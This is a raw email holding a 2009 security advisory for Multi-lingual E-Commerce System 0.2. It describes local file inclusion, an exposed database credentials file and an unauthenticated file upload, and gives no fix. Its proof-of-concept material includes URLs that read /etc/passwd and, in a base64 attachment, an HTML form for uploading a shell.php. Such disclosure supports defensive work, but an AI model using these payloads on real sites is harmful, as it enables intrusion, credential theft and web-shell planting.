|
|
--001636c5a7364015950467ea1c3f
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
******* Salvatore "drosophila" Fresta *******
[+] Application: Multi-lingual E-Commerce System
[+] Version: 0.2
[+] Website: http://sourceforge.net/projects/mlecsphp/
[+] Bugs: [A] Local File Inclusion
[B] Information Disclosure
[C] Arbitrary File Upload
[+] Exploitation: Remote
[+] Date: 19 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] Local File Inclusion
[-] Risk: hight
[-] File affected: index.php
This bug allows a guest to include local files.
The following is the vulnerable code:
...
if (isset($_GET['lang'])) { $_SESSION['lang'] = $_GET['lang'];}
...
...
- [B] Information Disclosure
[-] Risk: medium
[-] File affected: database.inc
This file contains reserved informations such as
the username and the password for connecting to
the database. Using .inc extension only, the
content is visible.
- [C] Arbitrary File Upload
[-] Risk: medium
[-] File affected: product_image.php
In the admin directory there are no files that
check if the user has admin privileges. For this
reason a guest can execute the files contained in
this directory. product_image.php contains a form
that allows to upload files on the system but
does not contain functions that check the files
extensions, however a user can upload arbitrary
files.
*************************************************
[+] Code
- [A] Local File Inclusion
http://www.site.com/path/index.php?page=../../../../../etc/passwd
--001636c5a7364015950467ea1c3f
Content-Type: text/plain; charset=windows-1257;
name="Multi-lingual E-Commerce System 0.2 Multiple Remote Vulnerabilities-19042009.txt"
Content-Disposition: attachment;
filename="Multi-lingual E-Commerce System 0.2 Multiple Remote Vulnerabilities-19042009.txt"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_ftpwbbac0
KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw
cGxpY2F0aW9uOiBNdWx0aS1saW5ndWFsIEUtQ29tbWVyY2UgU3lzdGVtClsrXSBWZXJzaW9uOiAw
LjIKWytdIFdlYnNpdGU6IGh0dHA6Ly9zb3VyY2Vmb3JnZS5uZXQvcHJvamVjdHMvbWxlY3NwaHAv
CgpbK10gQnVnczogW0FdIExvY2FsIEZpbGUgSW5jbHVzaW9uCiAgICAgICAgICBbQl0gSW5mb3Jt
YXRpb24gRGlzY2xvc3VyZQogICAgICAgICAgW0NdIEFyYml0cmFyeSBGaWxlIFVwbG9hZAoKWytd
IEV4cGxvaXRhdGlvbjogUmVtb3RlClsrXSBEYXRlOiAxOSBBcHIgMjAwOQoKWytdIERpc2NvdmVy
ZWQgYnk6IFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhClsrXSBBdXRob3I6IFNhbHZhdG9y
ZSAiZHJvc29waGlsYSIgRnJlc3RhClsrXSBDb250YWN0OiBlLW1haWw6IGRyb3NvcGhpbGF4eHhA
Z21haWwuY29tCgoKKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKgoKWytdIE1lbnUKCjEpIEJ1Z3MKMikgQ29kZQozKSBGaXgKCgoqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqCgpbK10gQnVncwoKCi0gW0FdIExvY2Fs
IEZpbGUgSW5jbHVzaW9uCgpbLV0gUmlzazogaGlnaHQKWy1dIEZpbGUgYWZmZWN0ZWQ6IGluZGV4
LnBocAoKVGhpcyBidWcgYWxsb3dzIGEgZ3Vlc3QgdG8gaW5jbHVkZSBsb2NhbCBmaWxlcy4KVGhl
IGZvbGxvd2luZyBpcyB0aGUgdnVsbmVyYWJsZSBjb2RlOgoKLi4uCgppZiAoaXNzZXQoJF9HRVRb
J2xhbmcnXSkpIHsgJF9TRVNTSU9OWydsYW5nJ10gPSAkX0dFVFsnbGFuZyddO30KCi4uLgoKPD8K
aW5jbHVkZSgkaW5jbHVkZV9wYXRoLicvaW5jLycuJF9HRVRbJ3BhZ2UnXS4nLScuJF9TRVNTSU9O
WydsYW5nJ10uJy5waHAnKTsKPz4KCi4uLgoKCi0gW0JdIEluZm9ybWF0aW9uIERpc2Nsb3N1cmUK
ClstXSBSaXNrOiBtZWRpdW0KWy1dIEZpbGUgYWZmZWN0ZWQ6IGRhdGFiYXNlLmluYwoKVGhpcyBm
aWxlIGNvbnRhaW5zIHJlc2VydmVkIGluZm9ybWF0aW9ucyBzdWNoIGFzCnRoZSB1c2VybmFtZSBh
bmQgdGhlIHBhc3N3b3JkIGZvciBjb25uZWN0aW5nIHRvCnRoZSBkYXRhYmFzZS4gVXNpbmcgLmlu
YyBleHRlbnNpb24gb25seSwgdGhlIApjb250ZW50IGlzIHZpc2libGUuCgotIFtDXSBBcmJpdHJh
cnkgRmlsZSBVcGxvYWQKClstXSBSaXNrOiBtZWRpdW0KWy1dIEZpbGUgYWZmZWN0ZWQ6IHByb2R1
Y3RfaW1hZ2UucGhwCgpJbiB0aGUgYWRtaW4gZGlyZWN0b3J5IHRoZXJlIGFyZSBubyBmaWxlcyB0
aGF0CmNoZWNrIGlmIHRoZSB1c2VyIGhhcyBhZG1pbiBwcml2aWxlZ2VzLiBGb3IgdGhpcwpyZWFz
b24gYSBndWVzdCBjYW4gZXhlY3V0ZSB0aGUgZmlsZXMgY29udGFpbmVkIGluCnRoaXMgZGlyZWN0
b3J5LiBwcm9kdWN0X2ltYWdlLnBocCBjb250YWlucyBhIGZvcm0KdGhhdCBhbGxvd3MgdG8gdXBs
b2FkIGZpbGVzIG9uIHRoZSBzeXN0ZW0gYnV0IApkb2VzIG5vdCBjb250YWluIGZ1bmN0aW9ucyB0
aGF0IGNoZWNrIHRoZSBmaWxlcyAKZXh0ZW5zaW9ucywgaG93ZXZlciBhIHVzZXIgY2FuIHVwbG9h
ZCBhcmJpdHJhcnkgCmZpbGVzLgoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioKClsrXSBDb2RlCgoKLSBbQV0gTG9jYWwgRmlsZSBJbmNsdXNpb24KCmh0
dHA6Ly93d3cuc2l0ZS5jb20vcGF0aC9pbmRleC5waHA/cGFnZT0uLi8uLi8uLi8uLi8uLi9ldGMv
cGFzc3dkACUwMAoKaHR0cDovL3d3dy5zaXRlLmNvbS9wYXRoL2luZGV4LnBocD9sYW5nPS8uLi8u
Li8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkACUwMAoKCi0gW0JdIEluZm9ybWF0aW9uIERpc2Nsb3N1
cmUKCmh0dHA6Ly93d3cuc2l0ZS5jb20vcGF0aC9hZG1pbi9pbmMvZGF0YWJhc2UuaW5jCgoKLSBb
Q10gQXJiaXRyYXJ5IEZpbGUgVXBsb2FkCgo8aHRtbD4KICA8aGVhZD4KICAgIDx0aXRsZT5NdWx0
aS1saW5ndWFsIEUtQ29tbWVyY2UgU3lzdGVtIDAuMiBBcmJpdHJhcnkgRmlsZSBVcGxvYWQgRXhw
bG9pdDwvdGl0bGU+CiAgPC9oZWFkPgogIDxib2R5PgogICAgPGZvcm0gZW5jdHlwZT0ibXVsdGlw
YXJ0L2Zvcm0tZGF0YSIgYWN0aW9uPSJodHRwOi8vc2l0ZS9wYXRoL2FkbWluL3Byb2R1Y3RfaW1h
Z2UucGhwIiBtZXRob2Q9IlBPU1QiPgoJIDxsYWJlbCBmb3I9InByb2R1Y3QiPlZhbGlkIHByb2R1
Y3QgSUQ6PC9sYWJlbD48YnI+CgkgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InByb2R1Y3QiIHZh
bHVlPSIxIj48YnI+CgkgPGxhYmVsIGZvcj0iZmlsZV9uYW1lIj5FdmlsIGZpbGUgbmFtZTo8L2xh
YmVsPjxicj4KCSA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iZmlsZV9uYW1lIiB2YWx1ZT0iL3No
ZWxsLnBocCI+PGJyPgoJIDxsYWJlbCBmb3I9InVzZXJmaWxlIj5GaWxlOjwvbGFiZWw+CgkgPGlu
cHV0IG5hbWU9InVzZXJmaWxlIiB0eXBlPSJmaWxlIj4KCSA8aW5wdXQgdHlwZT0iaGlkZGVuIiBu
YW1lPSJmaWxlX3BhdGgiPjxicj48YnI+CgkgPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IlVw
bG9hZCI+CiAgIDwvZm9ybT4KICA8L2JvZHk+CjwvaHRtbD4KCgoqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqCgpbK10gRml4CgpObyBmaXguCgoKKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKg=--001636c5a7364015950467ea1c3f--